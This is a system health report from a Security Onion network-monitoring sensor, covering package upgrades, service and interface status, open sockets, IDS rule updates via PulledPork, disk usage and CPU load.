Upgrade: securitySO-server-suricata:amd64 (3.0.1-1ubuntu1securitySO-server1, 3.1.1-1ubuntu1securitySO-server1), kpartx:amd64 (0.4.9-3ubuntu7.12, 0.4.9-3ubuntu7.13), mysql-client-core-5.5:amd64 (5.5.49-0ubuntu0.14.04.1, 5.5.50-0ubuntu0.14.04.1), securitySO-server-pfring-ld:amd64 (20120827-0ubuntu0securitySO-server9, 20120827-0ubuntu0securitySO-server10), isc-dhcp-common:amd64 (4.2.4-7ubuntu12.4, 4.2.4-7ubuntu12.5), dpkg:amd64 (1.17.5ubuntu5.6, 1.17.5ubuntu5.7), securitySO-server-capme:amd64 (20121213-0ubuntu0securitySO-server59, 20121213-0ubuntu0securitySO-server60), dkms:amd64 (X.X.X.X-1.1ubuntu5.14.04.5, X.X.X.X-1.1ubuntu5.14.04.7), libdrm-intel1:amd64 (2.4.64-1~ubuntu14.04.1, 2.4.67-1ubuntu0.14.04.1), libarchive13:amd64 (3.1.2-7ubuntu2.2, 3.1.2-7ubuntu2.3), gimp:amd64 (2.8.10-0ubuntu1, 2.8.10-0ubuntu1.1), dpkg-dev:amd64 (1.17.5ubuntu5.6, 1.17.5ubuntu5.7), libdrm-radeon1:amd64 (2.4.64-1~ubuntu14.04.1, 2.4.67-1ubuntu0.14.04.1), libgimp2.0:amd64 (2.8.10-0ubuntu1, 2.8.10-0ubuntu1.1), securitySO-server-nsmnow-admin-scripts:amd64 (20120724-0ubuntu0securitySO-server134, 20120724-0ubuntu0securitySO-server138), grub-common:amd64 (2.02~beta2-9ubuntu1.7, 2.02~beta2-9ubuntu1.11), libnspr4:amd64 (4.10.10-0ubuntu0.14.04.1, 4.12-0ubuntu0.14.04.1), libnss3-1d:amd64 (3.21-0ubuntu0.14.04.2, 3.23-0ubuntu0.14.04.1), base-files:amd64 (7.2ubuntu5.4, 7.2ubuntu5.5), curl:amd64 (7.35.0-1ubuntu2.6, 7.35.0-1ubuntu2.7), libimobiledevice4:amd64 (1.1.5+git20140313.bafe6a9e-0ubuntu1, 1.1.5+git20140313.bafe6a9e-0ubuntu1.1), libgd3:amd64 (2.1.0-3ubuntu0.1, 2.1.0-3ubuntu0.2), grub2-common:amd64 (2.02~beta2-9ubuntu1.7, 2.02~beta2-9ubuntu1.11), securitySO-server-daq:amd64 (2.0.6-0ubuntu0securitySO-server2, 2.0.6-0ubuntu0securitySO-server5), libldap-2.4-2:amd64 (2.4.31-1+nmu2ubuntu8.2, 2.4.31-1+nmu2ubuntu8.3), libnss3-nssdb:amd64 (3.21-0ubuntu0.14.04.2, 3.23-0ubuntu0.14.04.1), gimp-data:amd64 (2.8.10-0ubuntu1, 2.8.10-0ubuntu1.1), securitySO-server-web-page:amd64 (20141015-0ubuntu0securitySO-server57, 20141015-0ubuntu0securitySO-server60), xserver-xorg-core-lts-vivid:amd64 (1.17.1-0ubuntu3.1~trusty1, 1.17.1-0ubuntu3.1~trusty1.1), wget:amd64 (1.15-1ubuntu1.14.04.1, 1.15-1ubuntu1.14.04.2), libdpkg-perl:amd64 (1.17.5ubuntu5.6, 1.17.5ubuntu5.7), securitySO-server-snort:amd64 (X.X.X.X-1ubuntu1securitySO-server1, X.X.X.X-1ubuntu1securitySO-server1), securitySO-server-sostat:amd64 (20120722-0ubuntu0securitySO-server53, 20120722-0ubuntu0securitySO-server59), isc-dhcp-client:amd64 (4.2.4-7ubuntu12.4, 4.2.4-7ubuntu12.5), libnss3:amd64 (3.21-0ubuntu0.14.04.2, 3.23-0ubuntu0.14.04.1), libdrm-nouveau2:amd64 (2.4.64-1~ubuntu14.04.1, 2.4.67-1ubuntu0.14.04.1), libmysqlclient18:amd64 (5.5.49-0ubuntu0.14.04.1, 5.5.50-0ubuntu0.14.04.1), grub-pc-bin:amd64 (2.02~beta2-9ubuntu1.7, 2.02~beta2-9ubuntu1.11), apache2-data:amd64 (2.4.7-1ubuntu4.9, 2.4.7-1ubuntu4.13), grub-pc:amd64 (2.02~beta2-9ubuntu1.7, 2.02~beta2-9ubuntu1.11), sbsigntool:amd64 (0.6-0ubuntu7.1, 0.6-0ubuntu7.2), securitySO-server-pfring-daq:amd64 (20121107-0ubuntu0securitySO-server12, 20121107-0ubuntu0securitySO-server13), libcurl3:amd64 (7.35.0-1ubuntu2.6, 7.35.0-1ubuntu2.7), kpartx-boot:amd64 (0.4.9-3ubuntu7.12, 0.4.9-3ubuntu7.13), securitySO-server-setup:amd64 (20120912-0ubuntu0securitySO-server215, 20120912-0ubuntu0securitySO-server224), securitySO-server-pfring-userland:amd64 (20160204-1ubuntu1securitySO-server2, 20160708-1ubuntu1securitySO-server1), libexpat1:amd64 (2.1.0-4ubuntu1.2, 2.1.0-4ubuntu1.3), apache2:amd64 (2.4.7-1ubuntu4.9, 2.4.7-1ubuntu4.13), tzdata:amd64 (2016d-0ubuntu0.14.04, 2016f-0ubuntu0.14.04), apache2-bin:amd64 (2.4.7-1ubuntu4.9, 2.4.7-1ubuntu4.13), linux-libc-dev:amd64 (3.13.0-87.133, 3.13.0-92.139), libdrm2:amd64 (2.4.64-1~ubuntu14.04.1, 2.4.67-1ubuntu0.14.04.1), libxrandr2:amd64 (1.4.2-1, 1.5.0-1~trusty1), libcurl3-gnutls:amd64 (7.35.0-1ubuntu2.6, 7.35.0-1ubuntu2.7)
End-Date: 2016-08-01 16:47:18
Start-Date: 2016-08-14 03:33:26
Commandline: apt-get install open-vm-tools
Install: open-vm-tools:amd64 (9.4.0-1280544-5ubuntu6.2), zerofree:amd64 (1.0.2-1ubuntu1, automatic)
End-Date: 2016-08-14 03:33:56
=========================================================================
ELSA
=========================================================================
Syslog-ng
Checking for process:
1600 /usr/sbin/syslog-ng -p /var/run/syslog-ng.pid
Checking for connection:
Connection to localhost 514 port [tcp/shell] succeeded!
MySQL
Checking for process:
1606 /usr/sbin/mysqld
Checking for connection:
Connection to localhost 3306 port [tcp/mysql] succeeded!
Sphinx
Checking for process:
1513 su -s /bin/sh -c exec "$0" "$@" sphinxsearch -- /usr/bin/searchd --nodetach
1598 /usr/bin/searchd --nodetach
Checking for connection:
Connection to localhost 9306 port [tcp/*] succeeded!
ELSA Buffers in Queue:
3
If this number is consistently higher than 20, please see:
https://github.com/Security-Onion-Solutions/security-SO-server/wiki/FAQ#why-does-sostat-show-a-high-number-of-elsa-buffers-in-queue
ELSA Directory Sizes:
438M /nsm/elsa/data
2.3M /var/lib/mysql/syslog
32K /var/lib/mysql/syslog_data
ELSA Index Date Range
If you don't have at least 2 full days of logs in the Index Date Range,
then you'll need to increase log_size_limit in /etc/elsa_node.conf.
MIN(start) MAX(end)
2016-08-14 03:21:41 2016-08-14 18:40:52
robbie@onion:~$ cd /etc/nsm/rules
robbie@onion:/etc/nsm/rules$ ls
app-layer-events.rules bro downloaded.rules local.rules smtp-events.rules tls-events.rules
backup classification.config files.rules modbus-events.rules so_rules.rules white_list.rules
black_list.rules decoder-events.rules gen-msg.map reference.config stream-events.rules
bpf.conf dns-events.rules http-events.rules sid-msg.map threshold.conf
robbie@onion:/etc/nsm/rules$
=========================================================================
Service Status
=========================================================================
Status: securitySO-server
* SO-user server[ OK ]
Status: HIDS
* ossec_agent (SO-user)[ OK ]
Status: Bro
Getting process status ...
Getting peer status ...
Name Type Host Status Pid Peers Started
manager manager localhost running 108979 2 14 Aug 17:37:09
proxy proxy localhost running 109019 2 14 Aug 17:37:11
SO-server-eth1-1 worker localhost running 109060 2 14 Aug 17:37:14
Status: SO-server-eth1
* netsniff-ng (full packet data)[ OK ]
* pcap_agent (SO-user)[ OK ]
* snort_agent-1 (SO-user)[ OK ]
* snort-1 (alert data)[ OK ]
* barnyard2-1 (spooler, unified2 format)[ OK ]
=========================================================================
Interface Status
=========================================================================
eth0 Link encap:Ethernet HWaddr MM:MM:MM:MM:MM:MM
inet addr:X.X.X.X Bcast:X.X.X.X Mask:X.X.X.X
inet6 addr: X.X.X.X/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:33340 errors:0 dropped:0 overruns:0 frame:0
TX packets:19018 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:28314801 (28.3 MB) TX bytes:1886387 (1.8 MB)
eth1 Link encap:Ethernet HWaddr MM:MM:MM:MM:MM:MM
UP BROADCAST RUNNING NOARP PROMISC MULTICAST MTU:1550 Metric:1
RX packets:56106923 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:56503542122 (56.5 GB) TX bytes:0 (0.0 B)
lo Link encap:Local Loopback
inet addr:X.X.X.X Mask:X.X.X.X
inet6 addr: X.X.X.X/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:2744340 errors:0 dropped:0 overruns:0 frame:0
TX packets:2744340 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4550474303 (4.5 GB) TX bytes:4550474303 (4.5 GB)
=========================================================================
Link Statistics
=========================================================================
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default
link/loopback MM:MM:MM:MM:MM:MM brd MM:MM:MM:MM:MM:MM
RX: bytes packets errors dropped overrun mcast
4550474303 2744340 0 0 0 0
RX errors: length crc frame fifo missed
0 0 0 0 0
TX: bytes packets errors dropped carrier collsns
4550474303 2744340 0 0 0 0
TX errors: aborted fifo window heartbeat
0 0 0 0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP mode DEFAULT group default qlen 1000
link/ether MM:MM:MM:MM:MM:MM brd MM:MM:MM:MM:MM:MM
RX: bytes packets errors dropped overrun mcast
28314801 33340 0 0 0 538
RX errors: length crc frame fifo missed
0 0 0 0 0
TX: bytes packets errors dropped carrier collsns
1886387 19018 0 0 0 0
TX errors: aborted fifo window heartbeat
0 0 0 0
3: eth1: <BROADCAST,MULTICAST,NOARP,PROMISC,UP,LOWER_UP> mtu 1550 qdisc mq state UP mode DEFAULT group default qlen 1000
link/ether MM:MM:MM:MM:MM:MM brd MM:MM:MM:MM:MM:MM
RX: bytes packets errors dropped overrun mcast
56503734284 56107111 0 0 0 97545
RX errors: length crc frame fifo missed
0 0 0 0 0
TX: bytes packets errors dropped carrier collsns
0 0 0 0 0 0
TX errors: aborted fifo window heartbeat
0 0 0 0
=========================================================================
Disk Usage
=========================================================================
Filesystem Size Used Avail Use% Mounted on
udev 4.9G 4.0K 4.9G 1% /dev
tmpfs 999M 3.6M 995M 1% /run
/dev/dm-0 187G 50G 128G 29% /
none 4.0K 0 4.0K 0% /sys/fs/cgroup
none 5.0M 0 5.0M 0% /run/lock
none 4.9G 7.6M 4.9G 1% /run/shm
none 100M 28K 100M 1% /run/user
/dev/sda1 236M 48M 177M 22% /boot
=========================================================================
Network Sockets
=========================================================================
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
avahi-dae 1316 avahi 12u IPv4 15407 0t0 UDP *:5353
avahi-dae 1316 avahi 13u IPv6 15408 0t0 UDP *:5353
avahi-dae 1316 avahi 14u IPv4 15409 0t0 UDP *:34750
avahi-dae 1316 avahi 15u IPv6 15410 0t0 UDP *:42098
sshd 1473 root 3u IPv4 13086 0t0 TCP *:ssh_port (LISTEN)
sshd 1473 root 4u IPv6 13088 0t0 TCP *:ssh_port (LISTEN)
cups-brow 1581 root 6u IPv6 20242 0t0 TCP [X.X.X.X]:52879->[X.X.X.X]:631 (CLOSE_WAIT)
cups-brow 1581 root 8u IPv4 20244 0t0 UDP *:631
searchd 1598 sphinxsearch 7u IPv4 14711 0t0 TCP *:9306 (LISTEN)
searchd 1598 sphinxsearch 8u IPv4 14712 0t0 TCP *:9312 (LISTEN)
syslog-ng 1600 root 9u IPv4 14713 0t0 TCP *:514 (LISTEN)
syslog-ng 1600 root 10u IPv4 14714 0t0 UDP *:514
mysqld 1606 mysql 10u IPv4 17992 0t0 TCP X.X.X.X:3306 (LISTEN)
salt-mini 1665 root 13u IPv4 18807 0t0 TCP X.X.X.X:54576->X.X.X.X:4506 (ESTABLISHED)
salt-mini 1665 root 24u IPv4 18842 0t0 TCP X.X.X.X:39672->X.X.X.X:4505 (ESTABLISHED)
ossec-csy 1683 ossecm 5u IPv4 16838 0t0 UDP X.X.X.X:49198->X.X.X.X:514
salt-mast 1787 root 12u IPv4 14887 0t0 TCP *:4505 (LISTEN)
salt-mast 1787 root 14u IPv4 19513 0t0 TCP X.X.X.X:4505->X.X.X.X:39672 (ESTABLISHED)
salt-mast 1801 root 20u IPv4 14893 0t0 TCP *:4506 (LISTEN)
salt-mast 1801 root 22u IPv4 18808 0t0 TCP X.X.X.X:4506->X.X.X.X:54576 (ESTABLISHED)
cupsd 3292 root 10u IPv6 21099 0t0 TCP [X.X.X.X]:631 (LISTEN)
cupsd 3292 root 11u IPv4 21100 0t0 TCP X.X.X.X:631 (LISTEN)
ntpd 4733 ntp 16u IPv4 27047 0t0 UDP *:123
ntpd 4733 ntp 17u IPv6 27048 0t0 UDP *:123
ntpd 4733 ntp 18u IPv4 27054 0t0 UDP X.X.X.X:123
ntpd 4733 ntp 19u IPv4 27055 0t0 UDP X.X.X.X:123
ntpd 4733 ntp 20u IPv6 27056 0t0 UDP [X.X.X.X]:123
ntpd 4733 ntp 21u IPv6 27057 0t0 UDP [X.X.X.X]:123
/usr/sbin 4821 root 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 4821 root 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 4821 root 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
tclsh 16489 SO-user 13u IPv4 220962 0t0 TCP *:7734 (LISTEN)
tclsh 16489 SO-user 14u IPv6 220963 0t0 TCP *:7734 (LISTEN)
tclsh 16489 SO-user 15u IPv4 220966 0t0 TCP *:7736 (LISTEN)
tclsh 16489 SO-user 16u IPv6 220967 0t0 TCP *:7736 (LISTEN)
tclsh 16489 SO-user 17u IPv4 356927 0t0 TCP X.X.X.X:7736->X.X.X.X:48703 (ESTABLISHED)
tclsh 16489 SO-user 18u IPv4 356116 0t0 TCP X.X.X.X:7736->X.X.X.X:60252 (ESTABLISHED)
Error: database is locked: /nsm/bro/spool/state.db
tclsh 16489 SO-user 19u IPv4 356333 0t0 TCP X.X.X.X:7736->X.X.X.X:39679 (ESTABLISHED)
tclsh 16489 SO-user 20u IPv4 509520 0t0 TCP X.X.X.X:7734->X.X.X.X:37874 (ESTABLISHED)
tclsh 67434 SO-user 3u IPv4 358535 0t0 TCP X.X.X.X:48703->X.X.X.X:7736 (ESTABLISHED)
tclsh 67719 SO-user 3u IPv4 357056 0t0 TCP X.X.X.X:60252->X.X.X.X:7736 (ESTABLISHED)
tclsh 67964 SO-user 3u IPv4 357822 0t0 TCP X.X.X.X:39679->X.X.X.X:7736 (ESTABLISHED)
tclsh 67964 SO-user 4u IPv4 357823 0t0 TCP X.X.X.X:8101 (LISTEN)
tclsh 67964 SO-user 6u IPv4 466584 0t0 TCP X.X.X.X:8101->X.X.X.X:33916 (ESTABLISHED)
sshd 107314 root 3u IPv4 461280 0t0 TCP X.X.X.X:ssh_port->X.X.X.X:52220 (ESTABLISHED)
sshd 107385 SO-user 3u IPv4 461280 0t0 TCP X.X.X.X:ssh_port->X.X.X.X:52220 (ESTABLISHED)
bro 108979 SO-user 4u IPv4 466410 0t0 UDP X.X.X.X:43208->X.X.X.X:53
bro 108981 SO-user 0u IPv4 465485 0t0 TCP *:47761 (LISTEN)
bro 108981 SO-user 1u IPv6 465486 0t0 TCP *:47761 (LISTEN)
bro 108981 SO-user 2u IPv4 467205 0t0 TCP X.X.X.X:47761->X.X.X.X:39503 (ESTABLISHED)
bro 108981 SO-user 4u IPv4 466410 0t0 UDP X.X.X.X:43208->X.X.X.X:53
bro 108981 SO-user 268u IPv4 467225 0t0 TCP X.X.X.X:47761->X.X.X.X:39504 (ESTABLISHED)
bro 109019 SO-user 4u IPv4 466457 0t0 UDP X.X.X.X:49233->X.X.X.X:53
bro 109021 SO-user 0u IPv4 465491 0t0 TCP X.X.X.X:39503->X.X.X.X:47761 (ESTABLISHED)
bro 109021 SO-user 4u IPv4 466457 0t0 UDP X.X.X.X:49233->X.X.X.X:53
bro 109021 SO-user 266u IPv4 465496 0t0 TCP *:47762 (LISTEN)
bro 109021 SO-user 267u IPv6 465497 0t0 TCP *:47762 (LISTEN)
bro 109021 SO-user 268u IPv4 465558 0t0 TCP X.X.X.X:47762->X.X.X.X:37169 (ESTABLISHED)
bro 109060 SO-user 4u IPv4 466470 0t0 UDP X.X.X.X:44709->X.X.X.X:53
bro 109061 SO-user 0u IPv4 468147 0t0 TCP X.X.X.X:39504->X.X.X.X:47761 (ESTABLISHED)
bro 109061 SO-user 4u IPv4 466470 0t0 UDP X.X.X.X:44709->X.X.X.X:53
bro 109061 SO-user 266u IPv4 468150 0t0 TCP X.X.X.X:37169->X.X.X.X:47762 (ESTABLISHED)
bro 109061 SO-user 271u IPv4 468155 0t0 TCP *:47763 (LISTEN)
bro 109061 SO-user 272u IPv6 468156 0t0 TCP *:47763 (LISTEN)
barnyard2 109167 SO-user 3u IPv4 468204 0t0 TCP X.X.X.X:33916->X.X.X.X:8101 (ESTABLISHED)
chromium- 110134 SO-user 62u IPv4 478697 0t0 UDP *:5353
chromium- 110134 SO-user 116u IPv6 515554 0t0 TCP [X.X.X.X]:60048->[X.X.X.X]:443 (CLOSE_WAIT)
wish 116156 SO-user 4u IPv4 508860 0t0 TCP X.X.X.X:37874->X.X.X.X:7734 (ESTABLISHED)
/usr/sbin 118049 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118049 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118049 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118050 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118050 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118050 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118051 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118051 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118051 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118071 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118071 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118071 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118072 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118072 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118072 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118073 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118073 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118073 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
=========================================================================
IDS Rules Update
=========================================================================
Sun Aug 14 03:17:24 UTC 2016
Backing up current local_rules.xml file.
Cleaning up local_rules.xml backup files older than 30 days.
Backing up current downloaded.rules file before it gets overwritten.
Cleaning up downloaded.rules backup files older than 30 days.
Backing up current local.rules file before it gets overwritten.
Cleaning up local.rules backup files older than 30 days.
Running PulledPork.
http://code.google.com/p/pulledpork/
_____ ____
`----,\ )
`--==\\ / PulledPork v0.7.0 - Swine Flu!
`--==\\/
.-~~~~-.Y|\\_ Copyright (C) 2009-2013 JJ Cummings
@_/ / 66\_ cumm...@gmail.com
| \ \ _(")
\ /-| ||'--' Rules give me wings!
\_\ \_\\
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Checking latest MD5 for emerging.rules.tar.gz....
Rules tarball download of emerging.rules.tar.gz....
They Match
Done!
Prepping rules from emerging.rules.tar.gz for work....
Done!
Reading rules...
Generating Stub Rules....
Done
Reading rules...
Reading rules...
Modifying Sids....
Done!
Processing /etc/nsm/pulledpork/enablesid.conf....
Modified 0 rules
Done
Processing /etc/nsm/pulledpork/dropsid.conf....
Modified 0 rules
Done
Processing /etc/nsm/pulledpork/disablesid.conf....
Modified 0 rules
Done
Setting Flowbit State....
Enabled 88 flowbits
Done
Writing /etc/nsm/rules/downloaded.rules....
Done
Generating sid-msg.map....
Done
Writing v1 /etc/nsm/rules/sid-msg.map....
Done
Writing /var/log/nsm/sid_changes.log....
Done
Rule Stats...
New:-------3102
Deleted:---158
Enabled Rules:----19810
Dropped Rules:----0
Disabled Rules:---4254
Total Rules:------24064
No IP Blacklist Changes
Done
Please review /var/log/nsm/sid_changes.log for additional details
Fly Piggy Fly!
Sun Aug 14 07:01:01 UTC 2016
Backing up current local_rules.xml file.
Cleaning up local_rules.xml backup files older than 30 days.
Backing up current downloaded.rules file before it gets overwritten.
Cleaning up downloaded.rules backup files older than 30 days.
Backing up current local.rules file before it gets overwritten.
Cleaning up local.rules backup files older than 30 days.
Sleeping for 45 minutes to avoid overwhelming rule sites.
Running PulledPork.
http://code.google.com/p/pulledpork/
_____ ____
`----,\ )
`--==\\ / PulledPork v0.7.0 - Swine Flu!
`--==\\/
.-~~~~-.Y|\\_ Copyright (C) 2009-2013 JJ Cummings
@_/ / 66\_ cumm...@gmail.com
| \ \ _(")
\ /-| ||'--' Rules give me wings!
\_\ \_\\
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Checking latest MD5 for emerging.rules.tar.gz....
They Match
Done!
Prepping rules from emerging.rules.tar.gz for work....
Done!
Reading rules...
Generating Stub Rules....
Done
Reading rules...
Reading rules...
Modifying Sids....
Done!
Processing /etc/nsm/pulledpork/enablesid.conf....
Modified 0 rules
Done
Processing /etc/nsm/pulledpork/dropsid.conf....
Modified 0 rules
Done
Processing /etc/nsm/pulledpork/disablesid.conf....
Modified 0 rules
Done
Setting Flowbit State....
Enabled 88 flowbits
Done
Writing /etc/nsm/rules/downloaded.rules....
Done
Generating sid-msg.map....
Done
Writing v1 /etc/nsm/rules/sid-msg.map....
Done
Writing /var/log/nsm/sid_changes.log....
Done
Rule Stats...
New:-------0
Deleted:---0
Enabled Rules:----19810
Dropped Rules:----0
Disabled Rules:---4254
Total Rules:------24064
No IP Blacklist Changes
Done
Please review /var/log/nsm/sid_changes.log for additional details
Fly Piggy Fly!
=========================================================================
CPU Usage
=========================================================================
Load average for the last 1, 5, and 15 minutes:
10.88 9.87 9.87
Processing units: 4
If load average is higher than processing units,
then tune until load average is lower than processing units.
top - 18:40:16 up 14:49, 2 users, load average: 10.88, 9.87, 9.87
Tasks: 323 total, 6 running, 317 sleeping, 0 stopped, 0 zombie
%Cpu(s): 2.4 us, 0.6 sy, 0.0 ni, 91.6 id, 5.4 wa, 0.0 hi, 0.1 si, 0.0 st
KiB Mem: 10223820 total, 10090688 used, 133132 free, 28552 buffers
KiB Swap: 10485756 total, 81100 used, 10404656 free. 6745704 cached Mem
%CPU %MEM COMMAND
30.5 0.0 /opt/bro/bin/capstats -I 5 -n 1 -i eth1
16.1 4.0 snort -c /etc/nsm/SO-server-eth1/snort.conf -u SO-user -g SO-user -i eth1 -l /nsm/sensor_data/SO-server-eth1/snort-1 --perfmon-file /nsm/sensor_data/SO-server-eth1/snort-1.stats -U
11.0 1.1 /opt/bro/bin/bro -i eth1 -U .status -p broctl -p broctl-live -p local -p SO-server-eth1-1 local.bro broctl base/frameworks/cluster local-worker.bro broctl/auto
8.6 0.0 [kworker/0:2]
8.0 0.7 perl /opt/elsa/web/cron.pl -c /etc/elsa_web.conf
6.9 0.9 /usr/lib/chromium-browser/chro
6.1 0.1 barnyard2 -c /etc/nsm/SO-server-eth1/barnyard2-1.conf -u SO-user -g SO-user -d /nsm/sensor_data/SO-server-eth1/snort-1 -f snort.unified2 -w /etc/nsm/SO-server-eth1/barnyard2.waldo-1 -i 1 -U
5.1 2.7 netsniff-ng -i eth1 -o /nsm/sensor_data/SO-server-eth1/dailylogs/2016-08-14/ --user 1001 --group 1001 -s --prefix snort.log. --verbose --ring-size 256 iB --interval 150 iB
3.8 0.3 wish /usr/bin/SO-user.tk
3.0 0.9 chromium-browser --enable-pinch https://localhost/squert
2.9 0.0 [watchdog/0]
2.9 0.4 /opt/bro/bin/bro -U .status -p broctl -p broctl-live -p local -p manager local.bro broctl base/frameworks/cluster local-manager.bro broctl/auto
2.5 0.4 /opt/bro/bin/bro -U .status -p broctl -p broctl-live -p local -p proxy local.bro broctl base/frameworks/cluster local-proxy broctl/auto
2.5 0.0 [kworker/u256:5]
2.5 0.0 [kworker/u256:4]
2.3 0.0 [ksoftirqd/0]
1.9 0.0 [kworker/u256:3]
1.8 0.3 /usr/bin/X -core :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch
1.6 0.0 [kworker/u256:2]
1.6 0.0 [kworker/1:5]
1.5 0.0 [kworker/u256:1]
1.4 1.0 /usr/sbin/mysqld
1.2 0.0 [kworker/3:1]
1.2 0.0 [kworker/2:0]
1.0 2.9 /usr/bin/searchd --nodetach
0.9 0.0 [migration/0]
0.8 0.1 /usr/bin/python /opt/bro/bin/broctl cron
0.7 0.0 [watchdog/1]
0.7 0.0 [watchdog/2]
0.7 0.0 [watchdog/3]
0.7 0.0 [kworker/2:4]
0.3 0.0 [ksoftirqd/2]
0.3 0.0 [migration/3]
0.3 0.0 [ksoftirqd/3]
0.3 0.0 /usr/lib/rtkit/rtkit-daemon
0.3 6.8 tclsh /usr/bin/SO-userd -c /etc/nsm/securitySO-server/SO-userd.conf -a /etc/nsm/securitySO-server/autocat.conf -g /etc/nsm/securitySO-server/SO-userd.queries -A /etc/nsm/securitySO-server/SO-userd.access -C /etc/nsm/securitySO-server/certs
0.3 0.0 tclsh /usr/bin/snort_agent.tcl -c /etc/nsm/SO-server-eth1/snort_agent-1.conf
0.3 0.0 [kworker/u256:0]
0.3 0.6 /usr/lib/chromium-browser/chro
0.2 0.0 [rcu_sched]
0.2 0.0 [migration/1]
0.2 0.0 [migration/2]
0.2 0.0 [jbd2/dm-0-8]
0.2 0.1 /usr/sbin/syslog-ng -p /var/run/syslog-ng.pid
0.2 0.3 /usr/bin/python /usr/bin/salt-master
0.2 0.0 /usr/bin/vmtoolsd
0.2 0.3 xfdesktop
0.2 0.1 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libwhiskermenu.so 1 16777248 whiskermenu Whisker Menu Show a menu to easily access installed applications
0.1 0.0 [kswapd0]
0.1 0.0 /var/ossec/bin/ossec-syscheckd
0.1 0.4 perl /opt/elsa/node/elsa.pl -c /etc/elsa_node.conf
0.1 0.7 /opt/bro/bin/bro -i eth1 -U .status -p broctl -p broctl-live -p local -p SO-server-eth1-1 local.bro broctl base/frameworks/cluster local-worker.bro broctl/auto
0.1 0.0 /usr/lib/x86_64-linux-gnu/indicator-messages/indicator-messages-service
0.1 0.2 chromium-browser --enable-features=DocumentWriteEvaluator<DocumentWriteEvaluator,RenderingPipelineThrottling<RenderingPipelineThrottling,V8_Serialize_Age_Code<V8SerializeOptions,V8_Serialize_Eager<V8SerializeOptions,WebRTC-H264WithOpenH264FFmpeg<WebRTC-H264WithOpenH264FFmpeg,token-binding<TokenBinding,use-new-media-cache<use-new-media-cache --force-fieldtrials=AsyncDNS/AsyncDNSA/AutofillClassifier/Enabled/AutofillFieldMetadata/Enabled/AutofillProfileOrderByFrecency/EnabledLimitTo3/CaptivePortalInterstitial/Enabled/ChromeDashboard/Enabled/ChromotingQUIC/Enabled/DocumentWriteEvaluator/Enabled/EnableGoogleCachedCopyTextExperiment/Button/EnableSessionCrashedBubbleUI/Enabled/*ExtensionActionRedesign/Enabled/InstanceID/Enabled/LocalNTPSuggestionsService/Enabled/MaterialDesignDownloads/Enabled/OfferUploadCreditCards/Enabled/PageRevisitInstrumentation/Enabled/PasswordBranding/SmartLockBrandingSavePromptOnly/*QUIC/Enabled/RefreshTokenDeviceId/Enabled/RenderingPipelineThrottling/Enabled/ReportCertificateErrors/ShowAndPossiblySend/ResourcePriorities/AllExceptAsyncScripts_11011_1_1_10/SSLCommonNameMismatchHandling/Enabled/SafeBrowsingReportPhishingErrorLink/Enabled/SafeBrowsingUnverifiedDownloads/DisableByParameterMostSbTypes2/SafeBrowsingUpdateFrequency/UpdateTime15m/SchedulerExpensiveTaskBlocking/Enabled/SdchPersistence/Enabled/SimpleCacheTrial/ExperimentYes/StrictSecureCookies/Enabled/SyncHttpContentCompression/Enabled/TabSyncByRecency/Enabled/*TokenBinding/TokenBinding/V8SerializeOptions/SerializeEagerAndAgeCode/VarationsServiceControl/Interval_30min/WebFontsIntervention/Enabled/WebRTC-H264WithOpenH264FFmpeg/Enabled/WebRTC-LocalIPPermissionCheck/Enabled/WebRTC-PeerConnectionDTLS1.2/Enabled/use-new-media-cache/Enabled/ --type=gpu-process --channel=110134.0.1621162264 --window-depth=24 --supports-dual-gpus=false --gpu-driver-bug-workarounds=4,54 --gpu-vendor-id=0x15ad --gpu-device-id=0x0405 --gpu-driver-vendor --gpu-driver-version --v8-natives-passed-by-fd --v8-snapshot-passed-by-
0.0 0.0 /sbin/init
0.0 0.0 [kthreadd]
0.0 0.0 [kworker/0:0H]
0.0 0.0 [rcu_bh]
